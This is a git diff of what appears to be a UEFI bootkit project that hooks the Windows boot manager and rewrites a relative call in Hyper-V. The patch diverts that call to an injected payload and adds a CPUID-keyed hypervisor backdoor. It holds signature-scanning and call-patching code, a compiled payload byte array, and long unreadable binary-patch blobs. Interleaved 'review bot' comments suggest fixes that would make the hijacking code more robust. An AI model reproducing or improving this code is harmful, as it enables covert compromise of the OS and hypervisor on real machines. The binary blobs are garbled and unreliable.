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 
diff --git a/Voyager-1/PayLoad/x64/Release/vmexit_handler.obj b/Voyager-1/PayLoad/x64/Release/vmexit_handler.obj deleted file mode 100644 index ba442976ccd6bb4d3b4bf10f3dbef99b19376c88..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2743 zcmb7GZ){Ul6hCiojBbqCj*UM~pkN^*jMCv;MkV2Obo!8vE~CRio^)ONSfA@Z+Sk#+ zR3e517YP1~@q^Lu!Ds@0AR!DB`4dgVFUC*!C!&NzLy&+dA54_Y-+Aw~Yw?5GN$)-9 z{O&pT-Fxo2wSn?sebm`%Jv|;R7%r$1s$Lo{q*oV2_P;r_Vgx4&a zB4+G28XwJdb`&9!A>Db%j_R;yr*pl(=V{+SAQafz?Olm(OK)gpB^V6&xBGf~b^z`f z>(;3BbR(6^buWMKOBIAK{B&HNPJCuGkp+<75GL}>enjVfvQn7@Zb*G14 zATMol2oljZw18UZ+&(JtUM-qU=hAz1XKVi&XE38{N$r4^8gXt(Co>xSsgYccaCj^l zj_7(;8_w%$j+%hQ)kFrHD?@95M)U+R&*>a>-d7_st%II1_65}-&a4Ks_t0wX2E<+E z%IPs`v=5dBD}-(b*5Ggq0d&DXC|EHz&^S;Lc^ee+snJw=e~KQ3Eoar^XhFgHOcv2f zr|=br!^vaDJR^BEr-!rZh?diF0MtxkY2{v6b)$ir;p71~CsYe+G@MXVWCz?;g0otN zst}C^+UR(fy+CX5l`0Bi&Oe|P49x5}CQN*r5{5)HkLVD`X+C%h_yX`%;7#D`z!!q^ ziWY-!2VV-#5nBd6489!v0Jsx;0(><%$9xSqpUqoncCtCzu&PpKk^{(UAjQND>sWxz z(ZWzT*}kF6uwb8=bf!hH;LTN@AzXPjj%~&|B0&5}j$B?#=@~t1&Cf_qJD@_n50P&p zQitrqU)if~d^G%X{q7ZuuAch%!yY31fVZ4j6(4=m{!jgxRhy=kp8AF8MFYR~{>^XK z9;y+)AMfm~p8GZe`zP=zwAo**%I&zLnGE^8%5z#OmfoLpZqxLf((X~VrlN^_Ooiz7 zxZ5{+I@;YHWi+Wov$~RuBogVUJ3d>#LNbZ)WVIAr`K)YcH572HM=Yxm7}n>J&64Wq zlM;5Og#B8=Zj~^kpXFO^Np&P24Y};{(SXY)AHF>(Px@U$@+45d%Q;o$CwipdceTog zCtR&{`5+HF<@0whoc@WMyivC0y(ai2-I=~bQ_JF}OV?Drl2 zm?77q7h#R}#gN#SZG_vahA4-r(n0mZk(xM#+<=J5?Pq&j2HJ=EO1n~oubSyv--WNXb)NYB;HS?ox&5FcY@+x#jN%n{Yq4|t z<_Oc%ynAV{8qwVz&k3SSCQ@ES@E$~g>j%(71;iysWZYEUS3_WttjxhF(prZ)@n-JZ?HtehRSOVP9)Qd zXS{bke$z4qi(8^$L+-N5g9{x|DEk0(UOf}PnM`a`RZ&lIxgZK{296F?Lp*nR4Pt{X z3Naq6Aa_~)VPvTwSB$fA5p8qjBP2aOhvt1}( - reinterpret_cast(&vcpu_run) - - svm::voyager_context.vcpu_run_rva)(context); + svm::pgs_base_struct result = + reinterpret_cast( + reinterpret_cast(&vcpu_run) - + svm::voyager_context.vcpu_run_rva)(context); __svm_stgi(); + DBG_PRINT("after vcpu_run\n"); // gs:0 + 0x103B0 ] + 0x198 ] + 0xE80 ] = pointer to vmcb... 
auto vmcb = *reinterpret_cast( *reinterpret_cast( - reinterpret_cast( - result->pvcpu_context) + 0x198) + 0xE80); + *reinterpret_cast( + __readgsqword(0) + 0x103B0) + 0x198) + 0xE80); if (vmcb->exitcode == VMEXIT_CPUID && context->rcx == VMEXIT_KEY) { diff --git a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c index 8cd770f..17141bf 100644 --- a/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c +++ b/Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c @@ -138,8 +138,8 @@ EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw)))) return Result; - Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase); - Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize); + DBG_PRINT("Image Base -> 0x%p\n", BootMgfw->ImageBase); + DBG_PRINT("Image Size -> 0x%x\n", BootMgfw->ImageSize); VOID* ArchStartBootApplication = FindPattern( BootMgfw->ImageBase, @@ -148,10 +148,7 @@ EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) START_BOOT_APPLICATION_MASK ); - if (!ArchStartBootApplication) - return EFI_ABORTED; - - DBG_PRINT(L"ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication); + DBG_PRINT("ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication); MakeShitHook(&BootMgfwShitHook, ArchStartBootApplication, &ArchStartBootApplicationHook, TRUE); return Result; } @@ -181,6 +178,7 @@ EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, } else { + DBG_PRINT("some signature for winload found nothing (0), aborting...\n"); Print(L"nullptr detected, aborting...\n"); Print(L"Please submit a screenshot of this...\n"); } diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.c b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.c similarity index 60% rename from Voyager-2/Voyager-2 (2004-1709)/Hvix64.c rename to Voyager-2/Voyager-2 (2004-1709)/Hvax64.c index 27bbba9..b06f0b5 100644 
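Review bot: `DBG_PRINT("Image Size -> 0x%x\n", BootMgfw->ImageSize)` prints a `UINTN` with `%x`; if `DBG_PRINT` forwards to an EDK2 Print-family function (its definition is outside this diff), `%x` consumes a 32-bit argument, so `%lx` is the matching conversion. The new `DBG_PRINT(... 0x%p ...)` lines in the Hvax64.c hunk at `@@ -91,69 +91,52 @@` have the inverse mismatch, passing `UINT64` values (`VCpuRunCallRip`, `VCpuRunFunction`, `VCpuRunHandlerRVA`) and an `INT32` (`NewVCpuRunRVA`) to `%p`; `%lx` and `%x` respectively fit those. The switch from `Print(L"...")` to `DBG_PRINT("...")` also changes the format strings from wide to narrow, which only works if `DBG_PRINT` takes an ASCII format, so that is worth confirming against its definition.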
--- a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.c +++ b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.c @@ -1,6 +1,6 @@ -#include "Hvix64.h" +#include "Hvax64.h" -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase) { if (!VoyagerData || !ImageBase) return NULL; @@ -44,7 +44,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) { if (AsciiStrStr(VoyagerData->ModuleBase + Name[i], "voyager_context")) { - *(voyager_t*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; + *(VOYAGER_T*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; break; // DO NOT REMOVE? #Stink Code 2020... } } 
@@ -91,69 +91,52 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, UINT64 PayLoadSize ) { - if (!VoyagerData || !HypervAlloc || !HypervAllocSize || !PayLoadBase || !PayLoadSize) - return; - VoyagerData->HypervModuleBase = HypervAlloc; VoyagerData->HypervModuleSize = HypervAllocSize; VoyagerData->ModuleBase = PayLoadBase; VoyagerData->ModuleSize = PayLoadSize; - VOID* VmExitHandler = + VOID* VCpuRunCall = FindPattern( HypervAlloc, HypervAllocSize, - VMEXIT_HANDLER_SIG, - VMEXIT_HANDLER_MASK + VCPU_RUN_HANDLER_SIG, + VCPU_RUN_HANDLER_MASK ); - /* - .text:FFFFF80000237436 mov rcx, [rsp+arg_18] ; rcx = pointer to stack that contians all register values - .text:FFFFF8000023743B mov rdx, [rsp+arg_28] - .text:FFFFF80000237440 call vmexit_c_handler ; RIP relative call - .text:FFFFF80000237445 jmp loc_FFFFF80000237100 - */ - - UINT64 VmExitHandlerCall = ((UINT64)VmExitHandler) + 19; // + 19 bytes to -> call vmexit_c_handler - UINT64 VmExitHandlerCallRip = (UINT64)VmExitHandlerCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes - UINT64 VmExitFunction = VmExitHandlerCallRip + *(INT32*)((UINT64)(VmExitHandlerCall + 1)); // + 1 to skip E8 (call) and read 4 bytes (RVA) - VoyagerData->VmExitHandlerRva = ((UINT64)PayLoadEntry(PayLoadBase)) - (UINT64)VmExitFunction; + UINT64 VCpuRunCallRip = (UINT64)VCpuRunCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes + UINT64 VCpuRunFunction = VCpuRunCallRip + *(INT32*)((UINT64)VCpuRunCall + 1); // + 1 to skip E8 (call) and read 4 bytes (RVA) + VoyagerData->VCpuRunHandlerRVA = ((UINT64)PayLoadEntry(PayLoadBase)) - VCpuRunFunction; + + DBG_PRINT("VCpuRunCallRip -> 0x%p\n", VCpuRunCallRip); + DBG_PRINT("VCpuRunFunction -> 0x%p\n", VCpuRunFunction); + DBG_PRINT("VoyagerData->VCpuRunHandlerRVA -> 0x%p\n", VoyagerData->VCpuRunHandlerRVA); } -VOID* HookVmExit(VOID* 
HypervBase, VOID* HypervSize, VOID* VmExitHook) +VOID* HookVCpuRun(VOID* HypervBase, VOID* HypervSize, VOID* VCpuRunHook) { - if (!HypervBase || !HypervSize || !VmExitHook) - return NULL; - - VOID* VmExitHandler = + VOID* VCpuRunCall = FindPattern( HypervBase, HypervSize, - VMEXIT_HANDLER_SIG, - VMEXIT_HANDLER_MASK + VCPU_RUN_HANDLER_SIG, + VCPU_RUN_HANDLER_MASK ); - if (!VmExitHandler) - return NULL; + UINT64 VCpuRunCallRip = (UINT64)VCpuRunCall + 5; // + 5 bytes to next instructions address... + UINT64 VCpuRunFunction = VCpuRunCallRip + *(INT32*)((UINT64)VCpuRunCall + 1); // + 1 to skip E8 (call) and read 4 bytes (RVA) + INT32 NewVCpuRunRVA = ((INT64)VCpuRunHook) - VCpuRunCallRip; + *(INT32*)((UINT64)VCpuRunCall + 1) = NewVCpuRunRVA; - /* - .text:FFFFF80000237436 mov rcx, [rsp+arg_18] ; rcx = pointer to stack that contians all register values - .text:FFFFF8000023743B mov rdx, [rsp+arg_28] - .text:FFFFF80000237440 call vmexit_c_handler ; RIP relative call - .text:FFFFF80000237445 jmp loc_FFFFF80000237100 - */ - - UINT64 VmExitHandlerCall = ((UINT64)VmExitHandler) + 19; // + 19 bytes to -> call vmexit_c_handler - UINT64 VmExitHandlerCallRip = (UINT64)VmExitHandlerCall + 5; // + 5 bytes because "call vmexit_c_handler" is 5 bytes - UINT64 VmExitFunction = VmExitHandlerCallRip + *(INT32*)((UINT64)(VmExitHandlerCall + 1)); // + 1 to skip E8 (call) and read 4 bytes (RVA) - INT32 NewVmExitRVA = ((INT64)VmExitHook) - VmExitHandlerCallRip; - *(INT32*)((UINT64)(VmExitHandlerCall + 1)) = NewVmExitRVA; - return VmExitFunction; + DBG_PRINT("VCpuRunCallRip -> 0x%p\n", VCpuRunCallRip); + DBG_PRINT("VCpuRunFunction -> 0x%p\n", VCpuRunFunction); + DBG_PRINT("NewVCpuRunRVA -> 0x%p\n", NewVCpuRunRVA); + return VCpuRunFunction; } \ No newline at end of file diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h new file mode 100644 index 0000000..6d4a97c --- /dev/null +++ b/Voyager-2/Voyager-2 (2004-1709)/Hvax64.h 
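Review bot: The comment `// + 5 bytes because "call vmexit_c_handler" is 5 bytes` in MakeVoyagerData was carried over from the removed HookVmExit code, but the call being decoded is now the one matched by `VCPU_RUN_HANDLER_SIG`, so it names the wrong callee; `// + 5: length of the E8 rel32 call, i.e. the address the displacement is relative to` states what the arithmetic actually relies on. The scan-then-decode sequence (FindPattern, `+ 5`, `*(INT32*)(call + 1)`) now appears verbatim in both MakeVoyagerData and HookVCpuRun, and HookVCpuRun uses the decoded target only as its return value, so a single static helper returning the call site and its target would keep the two copies from drifting. The last parameter is `VCpuRunHook` here but `VmExitHook` in the Hvax64.h declaration, which is worth aligning.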
@@ -0,0 +1,35 @@
+#pragma once
+#include "PayLoad.h"
+
+#if WINVER == 2004
+#define VCPU_RUN_HANDLER_SIG "\xE8\x00\x00\x00\x00\x0F\x01\xDC"
+#define VCPU_RUN_HANDLER_MASK "x????xxx"
+#endif
+
+static_assert(sizeof(VCPU_RUN_HANDLER_SIG) == sizeof(VCPU_RUN_HANDLER_MASK), "signature does not match mask size!");
+
+//
+// AllocBase is the base address of the extra memory allocated below where hyper-v is
+// AllocSize is the size of the extra allocated memory... This size == module size...
+//
+VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase);
+
+//
+// sig scan hv.exe for vmexit call and replace the relative call (RVA) with
+// an RVA to the vmexit handler hook (which is the golden records entry point)...
+//
+// returns a pointer to the original vmexit function address...
+//
+VOID* HookVCpuRun(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook);
+
+//
+// creates a structure with all the data needed to be passed to the golden record...
+//
+VOID MakeVoyagerData
+(
+ PVOYAGER_T VoyagerData,
+ VOID* HypervAlloc,
+ UINT64 HypervAllocSize,
+ VOID* PayLoadBase,
+ UINT64 PayLoadSize
+);
\ No newline at end of file
diff --git a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h b/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h
deleted file mode 100644
index 0eed407..0000000
--- a/Voyager-2/Voyager-2 (2004-1709)/Hvix64.h
+++ /dev/null
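Review bot: `#if WINVER == 2004` has no `#else`, so for every other WINVER the two macros are simply never defined and the `static_assert(sizeof(VCPU_RUN_HANDLER_SIG) == sizeof(VCPU_RUN_HANDLER_MASK), ...)` on the next line fails with an undeclared-identifier error instead of saying the build is unsupported; add `#else` / `#error "no VCPU_RUN_HANDLER_SIG for this WINVER"` before the `#endif`. The comments were carried over unchanged from the VMX header: the block above `HookVCpuRun` still describes scanning for the "vmexit call" and a "vmexit handler hook", and the prototype names its last parameter `VmExitHook` while the definition calls it `VCpuRunHook`. A one-line comment on the pattern itself would also help future maintainers, since `0F 01 DC` is the encoding of STGI, i.e. the signature anchors on the `call` that is immediately followed by `stgi` — something like `// call vcpu_run ; stgi (0F 01 DC)` next to the define.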
@@ -1,54 +0,0 @@
-#pragma once
-#include "PayLoad.h"
-
-#if WINVER == 2004
-#define VMEXIT_HANDLER_SIG "\x65\xC6\x04\x25\x6D\x00\x00\x00\x00\x48\x8B\x4C\x24\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxxxxxxxxxxx?xxxx?x????x"
-#elif WINVER == 1909
-#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x"
-#elif WINVER == 1903
-#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x"
-#elif WINVER == 1809
-#define VMEXIT_HANDLER_SIG "\x48\x8B\x4C\x24\x00\xEB\x07\xE8\x00\x00\x00\x00\xEB\xF2\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxx?xxx????xxxxxx?x????x"
-#elif WINVER == 1803
-#define VMEXIT_HANDLER_SIG "\xF2\x80\x3D\xFC\x12\x46\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxxxxx?xx????xxxx?x????x"
-#elif WINVER == 1709
-#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x78\x0A\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
-#elif WINVER == 1703
-#define VMEXIT_HANDLER_SIG "\xD0\x80\x3D\x74\xCC\x47\x00\x00\x0F\x84\x00\x00\x00\x00\x48\x8B\x54\x24\x00\xE8\x00\x00\x00\x00\xE9"
-#define VMEXIT_HANDLER_MASK "xxxxxx??xx????xxxx?x????x"
-#endif
-
-static_assert(sizeof(VMEXIT_HANDLER_SIG) == sizeof(VMEXIT_HANDLER_MASK), "signature does not match mask size!");
-static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!");
-
-//
-// AllocBase is the base address of the extra memory allocated below where hyper-v is
-// AllocSize is the size of the extra allocated memory... This size == module size...
-//
-VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase);
-
-//
-// sig scan hv.exe for vmexit call and replace the relative call (RVA) with
-// an RVA to the vmexit handler hook (which is the golden records entry point)...
-//
-// returns a pointer to the original vmexit function address...
-//
-VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook);
-
-//
-// creates a structure with all the data needed to be passed to the golden record...
-//
-VOID MakeVoyagerData
-(
- pvoyager_t VoyagerData,
- VOID* HypervAlloc,
- UINT64 HypervAllocSize,
- VOID* PayLoadBase,
- UINT64 PayLoadSize
-);
\ No newline at end of file
diff --git a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c
index 35bca80..b2bdcd8 100644
--- a/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c
+++ b/Voyager-2/Voyager-2 (2004-1709)/PayLoad.c
@@ -44,18 +44,18 @@ unsigned char PayLoad[3072] = 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x05, 0x00, - 0x13, 0xB9, 0x72, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x91, 0x48, 0x75, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0xD4, 0x8A, 0x00, 0x00, + 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0xD4, 0x9E, 0x00, 0x00, 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 
@@ -66,10 +66,10 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0xA2, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, + 0x50, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x1C, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, + 0x74, 0x61, 0x00, 0x00, 0x34, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, @@ -79,7 +79,7 @@ unsigned char PayLoad[3072] = 0x0C, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, + 0x74, 0x61, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
@@ -113,20 +113,35 @@ unsigned char PayLoad[3072] = 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, - 0x24, 0x08, 0x48, 0x83, 0xEC, 0x58, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, - 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0xB8, 0x02, 0x44, 0x00, 0x00, - 0x0F, 0x78, 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C, 0x24, 0x28, 0x0A, 0x75, - 0x4F, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, - 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x48, 0x08, 0x75, 0x3A, 0x48, 0x8B, - 0x44, 0x24, 0x20, 0x48, 0xC7, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB8, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x78, 0x44, 0x24, 0x38, 0xB8, 0x0C, 0x44, 0x00, - 0x00, 0x0F, 0x78, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48, - 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0xB9, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x79, 0xC8, 0xEB, 0x21, 0x48, 0x8D, 0x05, 0x7D, - 0xFF, 0xFF, 0xFF, 0x48, 0x2B, 